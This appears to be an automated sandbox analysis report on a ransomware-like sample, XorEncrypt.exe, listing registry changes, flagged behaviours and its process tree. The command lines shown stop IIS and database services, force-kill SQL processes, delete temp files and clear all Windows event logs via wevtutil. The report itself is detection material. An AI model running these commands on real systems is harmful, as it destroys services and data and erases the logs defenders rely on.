Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura - Spanish (Spain)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\lsr1040.lxa" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L1041" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Haruka - Japanese (Japan)" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Ichiro" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\tn1031.bin" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\c1033.fe" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_en-US.dat.prev" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\es-ES\\M3082Pablo" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1036-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Katja" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR en-US Lts Lexicon" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\AI041033" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR fr-FR Locale Handler" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\AI041036" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 4940 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4940 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5044 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 4748 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4748 wrote to memory of 4276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4276 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4276 wrote to memory of 1144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 1160 wrote to memory of 1080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1160 wrote to memory of 1080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1080 wrote to memory of 3764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1080 wrote to memory of 3764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 1704 wrote to memory of 4072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1704 wrote to memory of 4072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4072 wrote to memory of 3860 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4072 wrote to memory of 3860 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 3500 wrote to memory of 4132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3500 wrote to memory of 4132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4132 wrote to memory of 3884 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4132 wrote to memory of 3884 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 4800 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4800 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2260 wrote to memory of 4344 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2260 wrote to memory of 4344 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2336 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2336 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2232 wrote to memory of 1764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2232 wrote to memory of 1764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3468 wrote to memory of 4024 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3468 wrote to memory of 4024 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5044 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 3516 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3516 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5044 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2000 wrote to memory of 1668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 2656 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2656 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5044 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe

"C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe"

C:\Windows\system32\cmd.exe

cmd /C "reg add HKEY_CLASSES_ROOT\.0xc5ffa1f0ccc01\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,47 /f"

C:\Windows\system32\reg.exe

reg add HKEY_CLASSES_ROOT\.0xc5ffa1f0ccc01\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,47 /f

C:\Windows\system32\cmd.exe

cmd /C "iisreset /stop"

C:\Windows\system32\cmd.exe

cmd /C "NET STOP IISADMIN"

C:\Windows\system32\net.exe

NET STOP IISADMIN

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 STOP IISADMIN

C:\Windows\system32\cmd.exe

cmd /C "net stop WAS"

C:\Windows\system32\net.exe

net stop WAS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop WAS

C:\Windows\system32\cmd.exe

cmd /C "NET stop MSSQLSERVER"

C:\Windows\system32\net.exe

NET stop MSSQLSERVER

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER

C:\Windows\system32\cmd.exe

cmd /C "NET stop \"SQL Server (MSSQLSERVER)\""

C:\Windows\system32\net.exe

NET stop \"SQL Server (MSSQLSERVER)\"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop \"SQL Server (MSSQLSERVER)\"

C:\Windows\system32\cmd.exe

cmd /C "net stop MSSQL$SQLEXPRESS"

C:\Windows\system32\net.exe

net stop MSSQL$SQLEXPRESS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS

C:\Windows\system32\cmd.exe

cmd /C "net stop SQLSERVERAGENT"

C:\Windows\system32\net.exe

net stop SQLSERVERAGENT

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT

C:\Windows\system32\cmd.exe

cmd /C "net stop mysql"

C:\Windows\system32\net.exe

net stop mysql

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mysql

C:\Windows\system32\cmd.exe

cmd /C "taskkill /F /IM sqlservr.exe /T"

C:\Windows\system32\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\system32\cmd.exe

cmd /C "taskkill /F /IM sqlceip.exe /T"

C:\Windows\system32\taskkill.exe

taskkill /F /IM sqlceip.exe /T

C:\Windows\system32\cmd.exe

cmd /C "taskkill /F /IM sqlwriter.exe /T"

C:\Windows\system32\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\system32\cmd.exe

cmd /C "Del /S /F /Q %Windir%\Temp"

C:\Windows\system32\cmd.exe

cmd /C C:\Users\Public\Log.cmd

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "wevtutil el | Foreach-Object {wevtutil cl "$_"}"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" el

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl AMSI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl AirSpaceChannel

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Application

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DirectShowFilterGraph

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl DirectShowPluginControl

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Els_Hyphenation/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl EndpointMapper

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl FirstUXPerf-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl ForwardedEvents

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "General Logging"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl HardwareEvents

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl IHM_DebugChannel

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Intel-iaLPSS-GPIO/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Intel-iaLPSS-I2C/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Intel-iaLPSS2-GPIO2/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Intel-iaLPSS2-GPIO2/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Intel-iaLPSS2-I2C/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Intel-iaLPSS2-I2C/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MF_MediaFoundationDeviceMFT

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MF_MediaFoundationDeviceProxy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MF_MediaFoundationFrameServer

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MedaFoundationVideoProc

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MedaFoundationVideoProcD3D

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationAsyncWrapper

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationContentProtection

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationDS

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationDeviceProxy

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationMP4

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationMediaEngine

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPerformance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPerformanceCore

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPipeline

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationPlatform

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl MediaFoundationSrcPrefetch

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-AppV-Client-Streamingux/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-AppV-Client/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-AppV-Client/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-AppV-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-AppV-Client/Virtual Applications"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-AppV-SharedPerformance/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Client-Licensing-Platform/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Client-Licensing-Platform/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Client-Licensing-Platform/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IE/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-IEFRAME/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-JSDumpHeap/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-OneCore-Setup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-PerfTrack-IEFRAME/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-PerfTrack-MSHTML/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-Admin/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"

C:\Windows\system32\wevtutil.exe

